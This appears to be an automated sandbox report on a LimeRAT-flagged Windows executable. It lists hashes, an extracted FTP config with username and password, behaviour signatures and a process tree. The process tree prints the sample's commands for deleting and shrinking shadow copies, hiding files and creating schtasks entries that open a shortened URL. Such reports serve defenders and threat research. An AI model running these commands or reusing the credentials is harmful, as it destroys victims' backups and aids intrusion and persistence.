Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
04-10-2022 21:22
General
-
Target
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
-
Size
242KB
-
MD5
10e6c5653d2929236947ca08594f0f55
-
SHA1
9ed6646ef7f0815d02066b60cd7bbc8d27cbf360
-
SHA256
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
-
SHA512
8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
SSDEEP
6144:mQvE/UVPy/oCa+LDZWC9z5NUb+knq1diDmN:3vzPygCa+DZCnq1c+
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops desktop.ini file(s) 3 IoCs
-
Enumerates connected drives 3 TTPs 17 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "00:35" /sc daily /mo "2" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "16:35" /sc daily /mo "1" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "15:16" /sc daily /mo "1" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "00:07" /sc weekly /mo "4" /d "Mon" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "07:20" /sc monthly /m "nov" /tn "NUC" /tr "'explorer'http://bit.ly/2Maxxq5"2⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c attrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe" & attrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D3⤵
-
C:\Windows\system32\attrib.exeattrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib -H -R -S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe" & attrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D3⤵
-
C:\Windows\system32\attrib.exeattrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +H +R +S "C:\Users\Admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D4⤵
- Views/modifies file attributes
-
-
-
C:\Users\Admin\AppData\Roaming\addins\iscsicli.exe"C:\Users\Admin\AppData\Roaming\addins\iscsicli.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
2Scheduled Task
1Defense Evasion
Disabling Security Tools
2File Deletion
2Hidden Files and Directories
1Modify Registry
3Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
Filesize
90KB
MD514efef5a091b2e4189b9103ddb849936
SHA185d4fd4436d4d87731ea83da4350265e5d6d6622
SHA256a1e65e10ae43f8e437ab824e29231b69a8458b4aebd8a77ac27d22b70169dae6
SHA51219bef3582ac2c23ebf253a11e9da33bedcb09f935bd63ba0ff37827e8e144554dcf8e40bf6d6a0ba2d81082f27571e274ae32ce657702b53ddd827189ea70442
-
Filesize
90KB
MD514efef5a091b2e4189b9103ddb849936
SHA185d4fd4436d4d87731ea83da4350265e5d6d6622
SHA256a1e65e10ae43f8e437ab824e29231b69a8458b4aebd8a77ac27d22b70169dae6
SHA51219bef3582ac2c23ebf253a11e9da33bedcb09f935bd63ba0ff37827e8e144554dcf8e40bf6d6a0ba2d81082f27571e274ae32ce657702b53ddd827189ea70442
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
136KB
-
Filesize
10.8MB
-
-
Filesize
10.8MB
-
Filesize
10.8MB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
264KB
-
-
-
-
Filesize
10.2MB
-
Filesize
24KB
-
Filesize
16KB
-
Filesize
12KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
44KB
-
Filesize
36KB
-
Filesize
24KB
-
Filesize
16KB
-
Filesize
16KB
-
Filesize
24KB
-
Filesize
12KB
-
Filesize
20KB
-
Filesize
12KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
44KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
12KB
-
Filesize
12KB
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
12KB
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
36KB
-
Filesize
16KB
-
Filesize
24KB
-
Filesize
36KB
-
Filesize
12KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
44KB
-
Filesize
12KB
-
Filesize
12KB
-
Filesize
16KB
-
Filesize
12KB
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
36KB
-
Filesize
36KB